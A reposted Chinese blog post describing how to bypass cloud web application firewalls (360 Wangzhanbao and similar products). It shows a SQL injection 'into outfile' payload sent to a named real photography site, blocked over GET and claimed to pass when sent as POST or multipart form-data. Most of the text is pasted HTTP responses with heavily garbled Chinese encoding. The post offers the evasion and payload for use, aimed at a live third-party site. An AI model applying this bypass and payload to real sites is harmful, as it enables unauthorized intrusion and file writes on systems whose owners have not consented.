360网站宝/安全宝/加速乐及其他类似产品防护绕过

360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过

在对GET请求处理的时候都能够识别攻击，但是一旦换成了POST请求或者是改造过的POST就不存在此问题了

GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1 Host: www.xiangshu.com Connection: keep-alive Content-Length: 1778 HTTP/1.1 493 Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:21:35 GMT Content-Type: text/html Content-Length: 5538 Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn <!DOCTYPE html> <html> <head> <title>ç¦æ¢è®¿é—®</title> <meta charset="utf-8" /> <meta name="author" content="" /> <meta name="keywords" content="" /> <meta name="description" content="" /> <style> body{margin:0; padding:0;text-align: center;font-family:"å¾®è½¯é›…é»‘" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;} div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;} h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;} .wrap{width:715px; margin:50px auto;} .waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; } .waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;} .main{border:1px solid #D0D0D0; border-radius:10px;} .warning-domain{padding:10px 20px;} .warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;} .warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;} .warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;} .warning-conlist dl{position:relative;} .warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;} .warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;} .warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;} </style> </head> <body> <div class="wrap"> <h1 class="waring-tips1"><p>ç¦æ¢è®¿é—®</p></h1> <div class="main"> <dl class="warning-domain"> <dt id="host"></dt> <dd>æ‚¨æäº¤çš„è¯·æ±‚å˜åœ¨å±é™©å†…å®¹ï¼Œå·²è¢«ç½‘ç«™å«å£«æ‹¦æˆªï¼</dd> </dl> <div class="warning-conlist"> <dl> <dt>æ‹¦æˆªç½‘å€ï¼š</dt> <dd id="wurl"> </dd> </dl> <dl> <dt>æ‹¦æˆªæ—¶é—´ï¼š</dt> <dd id="wdate">2013-03-28 16:19:25</dd> </dl> <dl style="margin-bottom:10px; border-bottom:1px solid #ccc"> <dt>å¤„ç†ç»[æžœï¼š</dt> <dd>IPå·²è¢«è®°å½•å¹¶æäº¤è‡³ç½‘ç»œç›‘å¯Ÿéƒ¨é—¨å¤‡æ¡ˆï¼</dd> </dl> <p>å¦‚æžœæ‚¨æ˜¯ç«™é•¿ï¼Œè¦ç»§ç»è®¿é—®ç½‘å€,è¯·è¿›å…¥<a href="javascript：void(0);" onclick="tongdao()" style="color:green">[ç«™é•¿ç»¿è‰²é€šé[]</a></p> <p >(ç«™é•¿ç»¿è‰²é€šé[ï¼šç½‘ç«™å«å£«ä¼šè‡ªåŠ¨å°†å½[å‰è¢«æ‹¦æˆªçš„URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3å°æ—¶ä¹‹å†…è¯¥URLä¸è¿›è¡Œå®‰å…¨æ£€æµ‹)</p> </div> </div> </div> <script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script> <script type="text/javascript"> function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // public method for encoding this.encode = function (input) { var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = _utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4); } return output; } // private method for UTF-8 encoding _utf8_encode = function (string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; } } function HTMLEncode(html) { var temp = document.createElement ("div"); (temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); var output = temp.innerHTML; temp = null; return output; } $(document).ready(function(){ $("#host").text(location.hostname); $("#wurl").text(HTMLEncode(location.href)); var myDate = new Date(); $("#wdate").text(myDate.toLocaleString()); }); function wubao(){ var host = location.hostname; location.href="fankui.html?"+host; } function tongdao(){ var host = location.hostname; var url = HTMLEncode(location.href); var index = url.indexOf("?"); if(index>0){ url = url.substr(0,index); } var b = new Base64(); url = b.encode(url); location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url; } </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-32745158-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>

换成

POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1 Host: www.xiangshu.com Connection: keep-alive Content-Length: 1778 HTTP/1.1 493 Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:22:04 GMT Content-Type: text/html Content-Length: 5538 Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn <!DOCTYPE html> <html> <head> <title>ç¦æ¢è®¿é—®</title> <meta charset="utf-8" /> <meta name="author" content="" /> <meta name="keywords" content="" /> <meta name="description" content="" /> <style> body{margin:0; padding:0;text-align: center;font-family:"å¾®è½¯é›…é»‘" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;} div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;} h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;} .wrap{width:715px; margin:50px auto;} .waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; } .waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;} .main{border:1px solid #D0D0D0; border-radius:10px;} .warning-domain{padding:10px 20px;} .warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;} .warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;} .warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;} .warning-conlist dl{position:relative;} .warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;} .warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;} .warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;} </style> </head> <body> <div class="wrap"> <h1 class="waring-tips1"><p>ç¦æ¢è®¿é—®</p></h1> <div class="main"> <dl class="warning-domain"> <dt id="host"></dt> <dd>æ‚¨æäº¤çš„è¯·æ±‚å˜åœ¨å±é™©å†…å®¹ï¼Œå·²è¢«ç½‘ç«™å«å£«æ‹¦æˆªï¼</dd> </dl> <div class="warning-conlist"> <dl> <dt>æ‹¦æˆªç½‘å€ï¼š</dt> <dd id="wurl"> </dd> </dl> <dl> <dt>æ‹¦æˆªæ—¶é—´ï¼š</dt> <dd id="wdate">2013-03-28 16:19:25</dd> </dl> <dl style="margin-bottom:10px; border-bottom:1px solid #ccc"> <dt>å¤„ç†ç»[æžœï¼š</dt> <dd>IPå·²è¢«è®°å½•å¹¶æäº¤è‡³ç½‘ç»œç›‘å¯Ÿéƒ¨é—¨å¤‡æ¡ˆï¼</dd> </dl> <p>å¦‚æžœæ‚¨æ˜¯ç«™é•¿ï¼Œè¦ç»§ç»è®¿é—®ç½‘å€,è¯·è¿›å…¥<a href="javascript：void(0);" onclick="tongdao()" style="color:green">[ç«™é•¿ç»¿è‰²é€šé[]</a></p> <p >(ç«™é•¿ç»¿è‰²é€šé[ï¼šç½‘ç«™å«å£«ä¼šè‡ªåŠ¨å°†å½[å‰è¢«æ‹¦æˆªçš„URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3å°æ—¶ä¹‹å†…è¯¥URLä¸è¿›è¡Œå®‰å…¨æ£€æµ‹)</p> </div> </div> </div> <script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script> <script type="text/javascript"> function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // public method for encoding this.encode = function (input) { var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = _utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4); } return output; } // private method for UTF-8 encoding _utf8_encode = function (string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; } } function HTMLEncode(html) { var temp = document.createElement ("div"); (temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); var output = temp.innerHTML; temp = null; return output; } $(document).ready(function(){ $("#host").text(location.hostname); $("#wurl").text(HTMLEncode(location.href)); var myDate = new Date(); $("#wdate").text(myDate.toLocaleString()); }); function wubao(){ var host = location.hostname; location.href="fankui.html?"+host; } function tongdao(){ var host = location.hostname; var url = HTMLEncode(location.href); var index = url.indexOf("?"); if(index>0){ url = url.substr(0,index); } var b = new Base64(); url = b.encode(url); location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url; } </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-32745158-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>

即不拦

如果还拦就换成文件上传的方式

------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7 Content-Disposition: form-data; name="folder" /blog/ ------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7 Content-Disposition: form-data; name="id" 1%20into%20outfile%20'/tmp/abc' HTTP/1.1 200 OK Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:22:23 GMT Content-Type: text/html Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn X-Powered-By: PHP /5.2.13 Content-Length: 6258 ï»¿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="/css/main.css" /> <script type="text/javascript" src="/assets/b043222/jquery.js"></script> <script type="text/javascript" src="/css/cycle.js"></script> <title>æ©¡æ ‘æ‘„å½±ç½‘-ä¸å›½æ©¡æ ‘æ‘„å½±çˆ±å¥½è€…ä¿±ä¹éƒ¨ www.xiangshu.com</title> <meta name="Description" content="æ©¡æ ‘æ‘„å½±ç½‘ www.xiangshu.com ä¸å›½è§„æ¨¡æœ€å¤§çš„æ‘„å½±ä¿±ä¹éƒ¨" /> <link rel="shortcut icon" href="http://www.xiangshu.com/images/xiangshu.ico" /> </head> <body> <div id="wrap"> <div id="header"> <div id="logo"> <div id="logopic"><a href=http://www.xiangshu.com/club/0><img src=http://www.2cto.com/uploadfile/2014/0113/20140113105359402.jpg border=0></a></div> <h1>ä¸å›½è§„æ¨¡æœ€å¤§çš„æ‘„å½±ä¿±ä¹éƒ¨</h1> </div> <div id="club"><a href="/club/0">æ€»ç«™</a> <a style="font-size:12px;font-weight:normal;color:red" href="/site/club"> [æ¢åŸŽå¸‚]</a> </div> <div id="banner"> <div id="enter"> <a href=http://www.xiangshu.com/read.php?tid=1004568>ç½‘ç«™çƒçº¿ç]µè¯:400-100-8885</a> | <a href=http://www.gxsyxy.com target="_blank">å…‰çº¿æ‘„å½±å¦é™¢</a> | <a href=http://www.xiangshu.com/club/0>æ€»ç«™é¦–é¡µå…¥å£</a> </div> <div class="clear"></div> <div id="subnav"> <ul> <li style="background:#006600"><a href=http://www.xiangshu.com/joining.php>æ³¨å†Œå…è´¹ä¼šå‘˜</a></li> <li style="background:#99CC00"><a href=http://www.xiangshu.com/read.php?tid=1004568>ç]³è¯·VIPä¼šå‘˜</a> </li> <li style="background:#FF9900"><a href=http://www.xiangshu.com/membercard.php>æ†ç»‘ä¼šå‘˜å¡</a></li> <li style="background:#666666"><a href=http://www.xiangshu.com/about/7>æ™¯ç‚¹åˆä½œå’Œæ¡ˆä¾‹</a> </li> </ul> </div> </div> </div> <div id="nav"> <div id="nav_l"></div> <div id="nav_bg"> <ul> <li><a href=http://www.xiangshu.com/pic/1>äºº æ–‡</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/2>é£Ž å…‰</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/3>ç¾Ž å¥³</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/4>åˆ› æ„</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=2>æ‘„å½±ç¤¾åŒº</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=64>é©´å‹ä¸[åŒº</a></li> <li class="btn"><a href=http://www.xiangshu.com/site/club>æ›´æ¢åŸŽå¸‚åˆ†ç«™</a></li> </ul> </div> <div id="nav_r"></div> </div> <div id="main"> <div id="index_top"></div> <div id="index_bg"> <div id="flash"> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359874.jpg" alt="è¿›å…¥å…¶ä»–åŸŽå¸‚å¯çœ‹æ›´å¤šå½[åœ°ç²¾åŽå›¾ç‰‡" /></a> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359659.jpg" alt="è¿›å…¥å…¶ä»–åŸŽå¸‚å¯çœ‹æ›´å¤šå½[åœ°ç²¾åŽå›¾ç‰‡" /></a> </div> <div id="map"> <div id="iframe"><iframe marginWidth="0" marginHeight="0" frameSpacing="0" src="http://www.xiangshu.com/map/" frameBorder="0" width="300" scrolling="no" height="242"></iframe></div> <div id="news"> <div id="news_tit"><span class="left">æ€»ç«™å…¬å‘Š</span><span class="right">ä»Žåœ°å›¾è¿›ä¿±ä¹éƒ¨ [<a href=club.html>æ–‡å—å…¥å£</a>] </span></div> <div id="news_list"> <ul> <li> <dl> <dt><a target="_blank" href="/article/view/id/62">çƒçƒˆåº†ç¥æ©¡æ ‘æ‘„å½±ç½‘åˆ›åŠž9å‘¨å¹´[åæœˆäºŒåå…]</a></dt> <dd>[10-20]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/61">æ©¡æ ‘ç½‘ä»£è¡¨åº]é‚€å‡ºå¸ä¸å›½ç¥žå†œæž¶åšå®¢é‚€è¯·èµ›</a></dt> <dd>[06-09]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/60">å…³äºŽå§]æ‰˜å]ç‘žå…ˆç]Ÿèµ´æ™¯åŒºæ´½è°ˆåˆä½œçš„å£°æ˜Ž</a></dt> <dd>[04-19]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/59">ç½‘ç«™å‡çº§:å›¾ç‰‡è´¨é‡ä¸Šå‡åˆ°500K,å¼€æ]¾å¤–é[¾</a></dt> <dd>[03-06]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/58">æ©¡æ ‘ç½‘å‰¯æ€»è£å’Œæœ¨çŽ‹å›½å®¶æ£®æž—å…¬å›ç¾çº¦</a></dt> <dd>[12-21]</dd> </dl> </li> </ul> </div> </div> </div> </div> <div id="index_bottom"></div> </div> <div id="hezuo"> <a href=http://www.xiangshu.com/about/6>å…³äºŽæ©¡æ ‘</a> - <a href=http://www.xiangshu.com/about/8>è]ç³»æˆ‘ä»¬</a> - <a href=http://www.xiangshu.com/link>å‹æƒ…é[¾æŽ¥</a> [ç²¤ICPå¤‡11037153å·] </div> </body> </html>

就不拦了......

查看更多关于360网站宝/安全宝/加速乐及其他类似产品防护绕过的详细内容...

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did15785

更新时间：2022-09-13 阅读：91次